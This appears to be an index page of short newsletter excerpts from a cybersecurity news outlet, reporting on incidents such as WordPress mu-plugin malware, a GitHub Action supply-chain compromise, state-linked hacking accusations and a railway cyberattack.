Newsletters

Written content from the Risky Business Media team

Risky Bulletin: Hackers abuse secret WordPress feature you'll probably want to disable

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

Hackers are abusing a little-known WordPress feature named Must Use Plugins to install and hide malware from site administrators.

Also known as mu-plugins, the Must Use Plugins feature was added to the WordPress CMS in 2022.

Plugins placed in a special folder named /mu-plugins are automatically installed and enabled on a website without users needing to manually approve them.

Risky Bulletin: France runs phishing test on 2.5 million students

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

The French government conducted last week a large-scale phishing test on over 2.5 million middle and high school students.

The test included a link in their school's digital workspace that advertised cheats and cracked games that redirected students to a phishing awareness video.

According to CNIL, France's privacy watchdog, over 210,000 students clicked the link, representing roughly one in twelve students.

The Signalgate Messages Have Been Released and Oh My God

Presented by

Tom Uren
Tom Uren

Policy & Intelligence

The Trump Administration's cavalier disregard for common sense security protocols is blatantly inviting serious security breaches. This week exposed the absence of any kind of security culture at the highest levels of the US national security community.

The story of how The Atlantic editor in chief was inadvertently added to a high-level US national security discussion covering plans for military action against Houthi rebels in Yemen has been well covered in the media, so we won't rehash it all.

In short, The Atlantic's Jeffrey Goldberg was added to a Signal group chat in which senior US officials discussed plans for military action against Houthi rebels in Yemen. The group chat included Vice President J.D. Vance, Defence Secretary Pete Hegseth, CIA Director John Ratcliffe and Director of National Intelligence Tulsi Gabbard, among others. 

Risky Bulletin: Cyberattack hits Ukraine's state railway

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

Ukraine's state railway company says that a "massive targeted cyber attack" has taken down its online ticketing system over the weekend.

The incident took place on Sunday night. In a Facebook post, Ukrzaliznytsia blamed the incident on "the enemy," a term Ukrainians use to describe Russia.

The company's website is currently down, and officials are restoring from backups. The incident was very likely a data wiper attack, which Russian hackers have employed on numerous occasions since Russia's invasion in February 2022.

Risky Bulletin: The looming epochalypse

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

I'll start this newsletter edition by saying from the get-go that today's topic—the Year 2038 problem—isn't new at all.

It has a Wikipedia page dating back to 2005, a 2009 XKCD comic, and was at the center of a Guardian article back in 2014.

It was a tweet from security researcher Pedro Umbelino last week that reminded me of this problem and how close to its deadline we have gotten—because, yes, everyone gets old!

Risky Bulletin: Hacktivists claim cyber-sabotage of 116 Iranian ships

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

An anti-regime hacktivist group has claimed credit over a cyberattack that crippled the on-ship communication systems of 116 Iranian ships.

The ships are operated by the National Iranian Tanker Company (50) and the Islamic Republic of Iran Shipping Company (66).

According to Nariman Gharib, a London-based Iranian cyber espionage investigator, the alleged affected vessels are these ones.

China's MSS Doxxes and Threatens Taiwanese APT Operators

Presented by

Tom Uren
Tom Uren

Policy & Intelligence

China ramped up its name and shame cyber rhetoric this week when it identified and threatened four Taiwanese individuals it alleges are involved in cyber operations targeting the mainland. 

The four were named in a Chinese Ministry of State Security (MSS) Weixin post that published the names, passport-style photographs, birthdates, ID numbers and job titles within Taiwan's Information Communication Electronic Force Command (ICEFCOM). The unit was set up in 2017 and brings together the Ministry of National Defense's communication, cyber and electronic warfare units. 

This is the second time that the MSS has doxxed Taiwanese military hackers. In September of last year it published the identities of three other alleged cyber operators, but without some of the more granular identifying details.

Risky Bulletin: China says Taiwan's military is behind PoisonIvy APT

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

China's main intelligence agency said on Monday that a branch of the Taiwanese military is behind an APT group known as PoisonIvy and GreenSpot.

China's Ministry of State Security (MSS) says a cyber warfare center (Network Environment Research and Analysis Center) inside the Taiwan Information, Communications, and Electronic Force Command (ICEFCOM) is behind the APT group's operations.

The MSS accused ICEFCOM of hacking Chinese government agencies, military targets, organizations in China's critical sectors, and private sector companies.

Risky Bulletin: GitHub supply chain attack prints everyone's secrets in build logs

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

A threat actor compromised a popular GitHub Action and added malicious code that prints out secret tokens in project build logs.

The incident took place on Friday and impacted tj-actions/changed-files (hereinafter Changed-Files), an automated action used by over 23,000 GitHub projects.

The action works by analyzing pull requests and detecting what files. It is used in complex CI/CD pipelines to trigger other actions based on what files are changed. It is a basic but very important automation script, and the reason why it become one of GitHub's most popular actions.

Risky Bulletin: FBI warns of online file converters that distribute malware

Presented by

Catalin Cimpanu
Catalin Cimpanu

News Editor

The FBI says that cybercriminals are using free file format and document conversion tools to scrape personal data and deploy malware, and even ransomware.

The warning applies to online websites that convert files between different formats, but also apps that users download on their devices.

Reports of malware being added to a converted file have been around for over a decade, although no major security breach has ever been linked to a file converter.